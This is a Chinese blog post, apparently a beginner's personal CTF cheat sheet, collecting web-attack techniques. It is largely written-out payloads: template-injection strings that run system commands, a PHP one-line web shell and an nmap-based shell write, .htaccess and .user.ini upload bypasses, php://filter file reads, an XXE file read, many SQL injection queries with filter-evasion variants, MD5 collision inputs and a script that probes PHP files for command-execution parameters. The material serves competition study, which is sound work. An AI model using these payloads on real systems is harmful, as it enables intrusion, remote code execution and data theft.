CTF常用知识点整理(个人刷题中整理)

最新推荐文章于 2024-09-23 20:20:28 发布
最新推荐文章于 2024-09-23 20:20:28 发布
阅读量4.3k 收藏 54
点赞数 8
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hopeace/article/details/118899415
版权

由于是之前刷题的整理,参照了很多大神的博客,由于过于零碎,没能记录下各位大神的文章出处(以后会提高版权意识的),如有侵权,私聊补加出处或者删文章。

博主是入门半年的萌新,文章不可避免会有很多错误,还请大家指正。

不是很了解格式问题,我的主页里上传了markdown文件,需要的也可以自行下载(免费下载),观感更好一点

### **PHP**

var_dump(  )    以列的形式展开数据,方便查看

scandir(    )        扫描某一文件夹目录

file_get_contents(   )      读取文件,拼接用'.' 如num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

base_convert() 函数 在任意进制之间转换数字,返回一个字符串

dechex() 函数:把十进制转换为十六进制。

hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符。

readfile() 函数读取文件

localeconv()函数返回一包含本地数字及货币格式信息的数组

```
配套使用
利用**scandir()**,传入'.'显示当前所有目录,即scandir('.')

但 '.'被不符合正则匹配的规则

 然后利用**localeconv()**函数返回一包含本地数字及货币格式信息的数组(其数组的第一个值就是.)

利用指针指向数组的第一个值

**`current()`** 函数返回数组中的当前元素的值。每个数组中都有一个内部的指针指向它的"当前"元素,初始指向插入到数组中的第一个元素。

**`pos()`** 函数返回数组中的当前元素的值。该函数是 current() 函数的别名。每个数组中都有一个内部的指针指向它的"当前"元素,初始指向插入到数组中的第一个元素。

**scandir(localeconv(current()));**
**`next()`** 函数将内部指针指向数组中的下一个元素,并输出。返回的是数组具体的值,不能嵌套。
**`array_reverse()`** 函数返回翻转顺序的数组。
```

exit()函数在退出的同时会返回输出变量

preg_replace()正则匹配,转译

处理172.17.0.2' -v -d a=1时

escapeshellarg()            ->'172.17.0.2'\'' -v -d a=1'

escapeshellcmd()          ->'172.17.0.2'\\'' -v -d a=1\ '

->为引用类,=>为数组赋值

#### 弱等于与强等于

$key == $str进行数据转换,如0dff字符串被强制转换为了整形0

$key === $str 要求为同样的数据

#### MD5强相等而原值不相等

if (md5($id) === md5($gg) && $id !== $gg) 

原理:PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”**0E**”开头的,那么PHP将会认为他们相同,都是**0**。

利用数组绕过

id[]=1

gg[]=2

#### MD5相同的值

```
->QNKCDZO
0e830400451993494058024219903391
->s878926199a
0e545993274517709034328855841020
->s155964671a
0e342768416822451524974117254469
->s214587387a
0e848240448830537924465865611904
->s214587387a
0e848240448830537924465865611904
->s878926199a
0e545993274517709034328855841020
->s1091221200a
0e940624217856561557816327384675
因为0e开头是0的多少次方都为0,所以其md5值都相同
```

#### MD5强碰撞

```php
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) 
```

```
a = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

b = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

```

#### $md5==md5($md5)

md5(0e215962017,32) = 0e291242476940776845150308577824

0exxxx都为0

所以可以md5=0e215962017

### 模板注入

X-Forward-For:{7 * 7}         回显49为Smarty模板注入

X-Forward-For:{system('pwd')}     在{}中执行命令

user={{7*'7'}} 回显49 ==>Twig                        若回显7777777 ==> Jinja2

常用利用方式

Twig

```
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
```

Smarty

```
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if system('cat /flag')}{/if}
// another
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
```

Jinja2

```
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('<command>').read()") }}{% endif %}{% endfor %}
```

Flask

```
app.config['FLAG'] = os.environ.pop('FLAG') 是可以读取配置的

{{config}}应该是可以查看app.config的内容
/shrine/{{url_for.__globals__}}
/shrine/{{url_for.__globals__['current_app'].config}}
/shrine/{{get_flashed_messages.__globals__['current_app'.config]}}
```

### 文件上传

#### 常用后缀

.phtml

#### 一句话木马

<?php @eval($_POST['SHELL']);?>

#### nmap执行

?host=' <?php @eval($_POST("shell");?)> -oG shell.php '

#### 解析绕过

先利用报错来查看中间件为什么

nginx -> user.ini

apache -> .htaccess

两种方式

两种文件不要用记事本写!

htaccess:

```
<FilesMatch "test.jpg">
Sethandler application/x-httpd-php
</FilesMatch>

```

or

```.htaccess
<FilesMatch "test.jpg">
Sethandler application/x-httpd-php
<!-- 将匹配到的 muma.jpg 文件按照php解析执行 -->

Addhandler php5-script .jpg
<!-- 将匹配到的 muma.jpg 文件按照php解析执行 -->

</FilesMatch>

```

ini:

```ini
GIF89a

auto_append_file=shell1.jpg
```

<script language="php">system('cat /flag');</script> 

### 目录扫描

index.php.bat

user.php.bak

phpmyadmin

robots.txt

.git源码泄露,用GitHack下载源码

python2 GitHack.py http://XXX.com

/www.tar.gz

www.zip

### 网页请求头

referer:www.baidu.com表示网页自百度而来

User-Agent: firefox         表示代理浏览器为火狐

X-Forwarded-For:            表示用户IP

### 代码审计

#### 伪协议读取

secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

file=php://filter/read=convert.base64-encode/resource=useless.php

#### 伪协议写入

text=data://text/plain;base64,xxx(为相对应的base64编码)

?text=data://text/plain,I have a dream

#### 其他

$$x = $$y

### 反序列化

1. 构造对应的类

   ```
   class Flag{  //flag.php  
       public $file=flag.php;  
       public function __tostring(){  
           if(isset($this->file)){  
               echo file_get_contents($this->file); 
               echo "<br>";
           return ("U R SO CLOSE !///COME ON PLZ");
           }  
       }  
   }  
   ```

2. 实例化

   $a = new Flag();

3. 赋值序列化

   $a->file="flag.php";
   echo serialize($a);

4. 利用反序列化时注意前边就执行网页,而不是读取源代码了

```php
<?php
class FileHandler{
    protected $op = 2;
    protected $filename = "php://filter/read=convert.base64-encode/resource=http:\\799e1c75-aa7f-4330-8a8f-d26a79d3d62d.node3.buuoj.cn\\flag.php";
    protected $content;
}
    $a = new FileHandler();
    $b = serialize($a);
    echo($b);
?>
```

产生乱码是因为使用了protected,可以将其改为public

### SQL注入

#### 常用语句

1' order by 1,2,3,4,5%23   -->爆字段

1' union select * from a%23  -->回显xxx.a不存在,也就是说database为xxx

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="xxx"%23    -->爆表(字段为3,xxx为数据库名)

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "xxxx"%23    -->爆列(xxxx为爆表中得到的表名)

1' union select 1,2,group_concat(id,username,password) from xxx%23 -->查看具体内容

xxx为表名,也可以用“数据名.列名”来表示

在联合查询并不存在的数据时,联合查询会构造一个虚拟的数据

() 代替空格, like代替等号

注意读取不全时,使用left,middle,right分段读取

#### 报错注入

注入的思路是一样的,知识利用了三个注入函数而已

floor extractvalue  xmlupdate

1'^extractvalue(1,concat(0x7e,(select**(**database()**)**)))%23

1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

1'^extractvalue(1,concat(0x7e,(select(left((password),30))from(geek.H4rDsq1))))%23

#### 万能密码

1' or 1=1#跳过判断

#### 堆叠注入

分号相隔,命令依次执行

如1;show databases;

​    1;show tables;

​    *,1代表当前数组的第二个值

#### Oracle与Mysql

Oracle支持

select $_GET['query'] || flag from flag

这样的拼接方式

此处的||不是或的意思,是用来拼接字符串

如果是mysql则为

1;set sql_mod=PIPES_AS_CONCAT;select 1

#### handler绕过

handler xxx open打开表

handler xxx read 读

handler xxx close 关闭

比如

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

其中first表示读取第一个字段

#### 其他绕过

##### union select

hpp参数污染绕过?no=-1 (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4#

内联注释绕过?no=-1 union/*!/*!50000select 1,2,3,4*/#

内联注释绕过?no=-1 union/*!/**/%0aselect*/ 1,2,3,4#(%0a为换行符)

内联注释绕过?no=-1 UnIoN/**/SeLecT/**/1,2,3,4# (注意这里不是加粗,时/* * /xx/ * */)

详情见大佬blog:https://www.cnblogs.com/xinxin999/p/12521014.html

### session伪造

利用secret_key及开源项目解密

组成为  1x.2x.3x

1x为信息内容,2x为时间,3x为前两项结合的加密

只有3x与前面符合才能生成正确的session信息

### Fuzz渗透测试

目录穿越../

多线程测试脚本实例(涉及I/O操作的,多线程会快很多)

```python
import os            #操纵文件目录
import requests        #获取站点信息
import re            #正则匹配
import threading    #多线程
import time            #运行时间
print('开始时间:  '+  time.asctime( time.localtime(time.time()) ))
s1=threading.Semaphore(100)                                            #这儿设置最大的线程数
filePath = r"D:/phpstudy_pro/WWW"
os.chdir(filePath)                                                    #改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5                                #设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False                                             # 设置连接活跃状态为False
def get_content(file):
    s1.acquire()                                                
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f:                            #打开php文件,提取所有的$_GET和$_POST的参数
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}                                                        #所有的$_POST
    params = {}                                                        #所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url = 'http://127.0.0.1/src/'+file
    req = session.post(url, data=data, params=params)            #一次性请求所有的GET和POST
    req.close()                                                # 关闭请求  释放内存
    req.encoding = 'utf-8'
    content = req.text
    #print(content)
    if "xxxxxx" in content:                                    #如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()                                                # 关闭请求  释放内存
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()                                                # 关闭请求  释放内存
                if "xxxxxx" in content:
                    break
        if flag == 1:                                                    #flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
            param = a
        else:
            param = b
        print('找到了利用文件: '+file+"  and 找到了利用的参数:%s" %param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:                                                            #加入多线程
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

```

### 其他

 ffffllllaaaagggg可能提示目录穿越四级

?  -->   %3F   -->   %253F(二次url加密)

参数在我个人的认识里要么是文件包含,要么是涉及php强弱类型等,但这些一般都会给出源代码,这个题显然没有

那么还有一种可能就是sql注入

题目中填写注册信息中有类似于博客地址这类的可能为SSRF

XML实体注入

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
    <!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123</password></user>
```

jsp架构中WEB-INF是其安全目录,客户端用户不可以直接访问

WEB-INF主要包含以下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。 /WEB-INF/database.properties:数据库配置文件 漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,通过反编译class文件,得到网站源码

Nginx配置文件信息

配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf

num要求num小于2000但num+1要大于2001

intval('2e4') = 2
'2e4'+1 = float(20001)
intval('2e4'+1) = 20001
you pass!

输入参数?num=2e4

cat  -> more

空格  -> $IFS$9

cat    ->   tac

cat和tac两者正好相反,tac从最末一行开始显示文件,每行的字符顺序不变

### **常用字符转换**

#### Unicode转换

https://www.compart.com/en/unicode/

#### 数学运算

is_nan64 ==>_G

tan15 ==>ET

异或

1 ^ 1 = 0

0 ^ 0 = 0

1 ^ 0 = 1

#### url编码

```
%23  #
```

#### ASCII:

```
chr(9) tab空格
chr(10) 换行 
chr(13) 回车   
Chr(13)&chr(10) 回车换行    
chr(32) 空格符    
chr(34) 双引号  
chr(39) 单引号
chr(33) !    
chr(34) "    
chr(35) #      
chr(36) $   
chr(37) %    
chr(38) &      
chr(39) '     
chr(40) (    
chr(41) )     
chr(42) *
chr(43) +    
chr(44) ,     
chr(45) -      
chr(46) .     
chr(47) /
Chr(48) 0    
Chr(49) 1  
Chr(50) 2    
Chr(51) 3     
Chr(52) 4     
Chr(53) 5    
Chr(54) 6     
Chr(55) 7     
Chr(56) 8     
Chr(57) 9
chr(58)      
chr(59) ;   
chr(60) <     
chr(61) =     
chr(62) >      
chr(63) ?     
chr(64) @
chr(65) A    
chr(66) B   
chr(67) C  
chr(68) D    
chr(69) E     
chr(70) F       
chr(71) G    
chr(72) H    
chr(73) I    
chr(74) J
chr(75) K    
chr(76) L   
chr(77) M   
chr(78) N    
chr(79) O     
chr(80) P     
chr(81) Q     
chr(82) R     
chr(83) S    
chr(84) T
chr(85) U    
chr(86) V    
chr(87) W   
chr(88) X     
chr(89) Y    
chr(90) Z
chr(91) [   
chr(92) \     
chr(93) ]    
chr(94) ^  
chr(95) _   
chr(96) `
chr(97) a  
chr(98) b  
chr(99) c    
chr(100) d    
chr(101) e     
chr(102) f      
chr(103) g    
chr(104) h   
chr(105) i
chr(106) j    
chr(107) k    
chr(108) l    
chr(109) m    
chr(110) n   
chr(111) o   
chr(112) p    
chr(113) q    
chr(114) r
chr(115) s     
chr(116) t    
chr(117) u   
chr(118) v    
chr(119) w    
chr(120) x     
chr(121) y   
chr(122) z
chr(123) {
chr(124) |    
chr(125) }    
chr(126) ~    
chr(127)      
chr(128)       
chr(153)™     
chr(169) ©       
chr(174) ®
```

     

Hopeace
关注
CTF-pwn pwntools用法探索_usage pwn checksec [-h] [--file [elf
2401_84254011的博客
04-26 440
options:options:options:options:options:options:options:options:options:还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
Web安全之PHP的伪协议漏洞利用,以及伪协议漏洞防护方法_php伪协议是漏洞吗(2)
2401_84297193的博客
05-02 39
通过在url后面添加了伪协议读取方式,我们就将它的源码以base64的编码格式读取出来了,通过这个例子,我们通过php://filter伪协议将服务器的flag.php文件源码读取出来了,说明这个伪协议可能造成源码或者服务器敏感信息泄露。PHP这门语言,凭借其上手快,轻量级,以往在建站的时候被广泛使用,现实使用较少了,虽然使用少了但我们还是要对其存在的漏洞有所了解,掌握其原理,以及了解其漏洞的基本利用方法。题目给了提示,文件包含,所以这个p盲猜是include内的参数,所以直接输入flag试试。
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTFPHP知识点总结
river
06-09 746
https://www.restran.net/2016/09/26/php-security-notes/
零基础小白如何入门CTF,看这一篇就够了(附学习笔记、靶场、工具包)_ctf入门
最新发布
shanguicsdn111的博客
09-23 1778
CTF(Capture The Flag)文一般译作夺旗赛,在网络安全领域指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场的“世界杯”。CTF靶场CTF
CTF密码学-编码基础知识点总结
qq_64584459的博客
05-08 6099
CTF密码学-编码基础知识点总结 0x01 目录 常见编码: 1.ASCII编码 2.Base64/32/16编码 3.shellcode编码 4.Quoted-printable编码 5.XXencode编码 6.UUencode编码 7.URL编...
CTF竞赛知识总结(持续更新)
余笙.'的博客
07-14 4088
PNG 文件头:89 50 4E 47 文件尾:AE 42 60 82JPG(jpeg) 文件头:FF D8 FF 文件尾:FF D9ZIP 文件头:50 4B 03 04GIF 文件头:47 49 46 38 文件尾:文件头修复:将图片的文件头修改为正确的文件头16进制异或: 工具---十六进制运算---二进制异或更改图片的高度或者宽度记录图片的拍摄日期、宽度、高度、分辨率、位深度等 kali使用exif隐写: exiftool + 图片名称 (显示文件信息、备注信息) 文件筛选:exiftoo
CTF密码学总结(二)
热门推荐
沐一 · 林 的博客
11-03 3万+
CTF 密码学总结 出人意料的flag: 指在题目获取到了flag,但是这个flag可能长得不像flag,或者flag还要经过进一步的脑洞处理,而不是常规的解密处理。 非预期行为: 指解题出现与预想结果不符合的一系列非预期行为,这基本说明了在间或前面存在其他自己还没分析的操作。 冗余锁定关键代码: 从后往前看,就是确定比较关键对象,从该对象开始排除其他无关变量,一步步找出与该对象有关的其它变量,最后串起找到的所有相关变量,然后开始逆向分析。 题目类型总结: 题目描述暗
2024年[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1),2024年最新网络安全高级面试必知必会
m0_60691292的博客
05-05 706
在实际的渗透测试过程,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;8、显示meterpreter,我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。
2024年业务安全对抗之黑产工具篇
2401_82645688的博客
05-02 161
内容爬取类工具软件:主要通过爬虫程序,采集短视频用户作品、自媒体文章等。特定功能类工具软件:主要包括模拟器、多开、改机和秒拨等功能工具软件,常见应用于注册账号、邀请新用户领取红包、刷赞、刷分享、刷评分和刷榜等场景。特定功能类工具软件种类和数量不多,但是在黑灰产业链也发挥着极其关键的作用。以改机软件“小辣椒”为例,在抖音引流这个场景,利用改机可以伪造位置,利用抖音附近视频的功能做引流,诱导附近看到视频的人添加微信小号。当然最主要还是在账号注册期间重复利用设备实现降低成本,
c# 高级编程-多线程安全_c# 多线程 数据安全
2401_84253089的博客
04-26 1175
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
CTF 学习笔记
梁辰兴的博客
10-06 5179
CTF起源于1996年DEFCON全球黑客大会,以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。WordPress是利用PHP开发的博客平台,用户可以在支持PHP和MySQL数据库的服务上架设属于自己的网站。也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。
CTF比赛总结(小白必看)
qq_53272273的博客
05-23 3077
它被设计为tcpdump 和其他使用 libpcap 库的软件使用的原始 PCAP格式的可扩展继承者.目前,只有 Wireshark 可以读取和写入 PCAPNG 文件,而 libpcap(以及使用它的软件)只能读取其一些文件。:用16进制编辑工具更改图片的高度,会只显示图片的一部分,下面的部分就被隐藏了,可以先看看图片的属性,得到宽高,找表示宽度和高度的位置的再转成16进制。特征:文由0和1构成,可能由空格、tab或则其他字符分割,去掉这些分割后,0和1的总数是5的倍数。
网络安全CTF入门教程(非常详细)从零基础入门到进阶,看这一篇就够了!
程序员若风的博客
12-11 3599
CTF(Capture The Flag)文一般译作夺旗赛,在网络安全领域指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场的“世界杯” 。
ctf php 弱类型,CTFPHP代码审计小tips-弱类型==与===比较
weixin_42458217的博客
04-03 839
阅读次数MiniProject_PHP_Code_audit-3 Writeup整体逻辑:这段代码的逻辑是用户输入username和password两个参数,如果username和password的相等,再判断username和password字符串的 sha1 散列与类型是否相等,如果相等才输出flag。考点:这段代码有一个逻辑点,怎么样使的两个相等,但是sha1()后的相等。=...
md5相等及碰撞绕过
weixin_44511709的博客
11-05 7327
ctf经常会遇到要求v1!=v2,但md5(v1)==md5(v2)的情况,所以上网搜集了一下资料,学习了一下大佬的思路,拓展思路。 在php,变量都是弱类型的(就是不指定特定数据类型的),使用if判等的时候要格外小心,使用特殊的参数可能会使本来不相等的if判断位相等,比如下面的例子。 <?php if (isset($_GET['a']) && isset($_G...
MD5算法
m0_37925407的博客
11-18 787
应用: 用于密码管理 当我们需要保存某些密码信息以用于身份确认时,如果直接将密码信息以明码方式保存在数据库,不使用任何保密措施,系统管理员就很容易能得到原来的密码信息,这些信息一旦泄露, 密码也很容易被破译。为了增加安全性,有必要对数据库需要保密的信息进行加密,这样,即使有人得到了整个数据库,如果没有解密算法,也不能得到原来的密码信息。MD5算法可以很好地解决这个问题,因为它可以将任意长度的输入串经过计算得到固定长度的输出,而且只有在明文相同的情况下,才能等到相同的密文,并且这个算法是不可逆的,即便
md5强比较的几种绕过,强碰撞,shal强比较的几种绕过,强碰撞
m0_73818134的博客
07-18 6293
md5强比较的几种绕过,强碰撞,shal强比较的几种绕过,强碰撞
PHP相等&amp;弱相等(附带科学计数法)_强等于 弱等于(1)
2401_83973995的博客
04-13 582
*但是**在网页上提交的数据是以字符串的形式传递给服务器的,包括数字。这里4476e3会变成4476000,所以不弱相等,而且intval在非字符串下才能够识别e的,但是这里是字符串(在网页上提交的数据是以字符串的形式传递给服务器的,包括数字。**2.数字+字符型**时,只会读取前面的数字(例外:**1e3aaa这样的字符串在比较时,取的是符合科学计数法的部分:1e3,也就是1000,e-4就变成了就是乘上了10的-4次方)**可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
PHP CTF习题整理常用函数与技巧应用
本篇文档是关于网络安全竞赛(CTF)的一些实用技巧和编程知识点总结,主要涉及PHP语言。以下是其的关键部分: 1. **PHP函数应用**: - `var_dump()`:用于以表格形式显示变量及其类型,方便快速检查数据结构。 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值